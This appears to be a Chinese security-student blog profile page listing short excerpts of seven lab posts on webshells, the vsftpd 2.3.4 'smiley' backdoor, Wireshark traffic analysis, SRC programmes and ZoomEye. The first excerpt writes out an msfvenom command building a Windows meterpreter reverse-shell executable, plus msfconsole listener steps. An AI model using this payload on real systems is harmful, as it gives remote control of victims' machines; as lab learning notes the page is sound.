自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(7)
  • 收藏
  • 关注

原创 复现对被控端控制,生成的被控端放入以上网站检测,分析并截图检测结果

1.在kali中生成被控端:msfvenom -p windows/meterpreter/reverse_tcp lhost= 虚拟机IP lport=5000 -f exe -o/root/payload.exe。3.在kali输入 msfconsole。set lhost kali的ip地址。4.检测(Virus Total)2.把生成的文件放进物理机上。上传payload文件。

2024-11-07 17:50:47 292

原创 一句话木马实验

一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。

2024-10-27 17:34:12 743

原创 渗透测试中菜刀的应用(webshell)

顾名思义,“web”的含义是显然。

2024-10-27 16:01:08 876

原创 笑脸漏洞(python脚本检测)

这个漏洞是开发者在软件中留下的后门漏洞,当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“:)”,密码任意,即可运行vsf sysutil extra (): 打开服务器的6200端口,并且不需要密码就能从6200端口以管理员身份登入目标服务器。因为输入用户名需要带有:),所以称笑脸漏洞。首先,我们用写好python代码,存入脚本中。将脚本以后缀名为.py的形式存在kali中。出现这几行字样即为检测成功。

2024-10-27 15:01:36 344

原创 qq9分析,协议:tcp or udp ;同一子网传输恢复文件

是在一组互连的计算机网络环境中提供分组交换计算机通信的数据报模式。UDP为应用程序提供了一种以最少的协议机制向其他程序发送消息的过程 [1]。连接到不同但互连的计算机通信网络的主计算机中的成对进程之间依靠TCP提供可靠的通信服务。TCP假设它可以从较低级别的协议获得简单的,可能不可靠的。从手机上传输一张图片到qq后,可以看到wireshark刷新出以下数据,这时我们右键该数据,并打开tcp的追踪流。首先,将手机和电脑连接到同一子网里,这时你可以连接同学热点或者学校的校园网。是一种面向连接的、可靠的、基于。

2024-10-27 13:46:34 1096 1

原创 关于src的学习

SRC是Security Response Center的缩写,即安全应急响应中心。它们通常由大型企业建立,目的是让外部的白帽子(道德黑客)提交可能被忽视的安全漏洞,以防止这些漏洞被恶意利用。

2024-10-26 16:13:17 2491

原创 ZoomEye及其他类似网络空间搜索引擎

ZoomEye 拥有两大探测引擎:Xmap 和 Wmap,分别针对网络空间中的设备及网站,通过 24 小时不间断的探测、识别,标识出互联网设备及网站所使用的服务及组件。研究人员可以通过 ZoomEye 方便的了解组件的普及率及漏洞的危害范围等信息。虽然被称为 “黑客友好” 的搜索引擎,但 ZoomEye 并不会主动对网络设备、网站发起攻击,收录的数据也仅用于安全研究。ZoomEye 更像是互联网空间的一张航海图。

2024-10-08 22:52:24 2036

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除